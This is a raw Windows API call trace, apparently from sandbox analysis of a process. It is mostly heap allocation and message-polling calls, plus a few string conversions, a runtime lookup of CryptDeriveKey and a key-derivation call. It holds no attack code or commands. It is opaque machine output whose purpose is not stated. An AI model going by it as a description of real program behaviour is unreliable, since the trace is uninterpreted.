PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.343] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.343] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.343] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.343] CryptHashData (hHash=0xaa58e0, pbData=0x24b1428, dwDataLen=0x3, dwFlags=0x1) returned 1 [0199.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.346] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.346] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.346] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.347] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.347] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.347] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.348] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.348] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.348] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.348] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0199.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9df8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0199.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.351] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0199.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0199.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.351] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 